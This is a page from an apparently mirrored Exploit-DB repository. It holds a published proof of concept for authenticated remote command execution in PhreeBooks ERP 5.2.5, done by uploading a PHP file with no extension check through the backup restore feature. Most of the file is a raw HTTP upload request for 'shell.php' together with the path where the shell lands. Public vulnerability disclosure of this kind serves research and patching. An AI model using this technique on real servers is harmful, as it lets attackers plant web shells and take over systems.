bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/48423.txt
Offensive Security cc95715dc2 DB: 2020-05-06 
10 changes to exploits/shellcodes

Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path

Saltstack 3000.1 - Remote Code Execution

BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
Fishing Reservation System 7.5 - 'uid' SQL Injection
Online Scheduling System 1.0 - 'username' SQL Injection
webERP 4.15.1 - Unauthenticated Backup File Access
PhreeBooks ERP 5.2.5 - Remote Command Execution
SimplePHPGal 0.7 - Remote File Inclusion
NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
2020-05-06 05:01:49 +00:00

50 lines
No EOL
1.7 KiB
Text
Raw Blame History

# Exploit Title: PhreeBooks ERP 5.2.5 - Remote Command Execution
# Date: 2020-05-01
# Author: Besim ALTINOK
# Vendor Homepage: https://www.phreesoft.com/
# Software Link: https://sourceforge.net/projects/phreebooks/
# Version: v5.2.4, v5.2.5
# Tested on: Xampp
# Credit: İsmail BOZKURT
-------------------------------------------------------------------------------------
There are no file extension controls on Image Manager (5.2.4) and on Backup
Restore. If an authorized user is obtained, it is possible to run a
malicious PHP file on the server.
--------------------------------------------------------------------------------------
One of the Vulnerable File: (backup.php)
-----------------------------------------
RCE PoC (Upload Process)
--------------------------------------------------------------------------------------
POST /pblast/index.php?&p=bizuno/backup/uploadRestore HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 *********************
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/pblast/index.php?&p=bizuno/backup/managerRestore
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------39525038724866743160620170
Content-Length: 231
DNT: 1
Connection: close
Cookie: **************************************************
-----------------------------39525038724866743160620170
Content-Disposition: form-data; name="fldFile"; filename="shell.php"
Content-Type: text/php
<? phpinfo(); ?>
-----------------------------39525038724866743160620170--
Shell directory:
-------------------------------
- http://localhost/pblast/myFiles/backups/shell.php
Reference in a new issue View git blame Copy permalink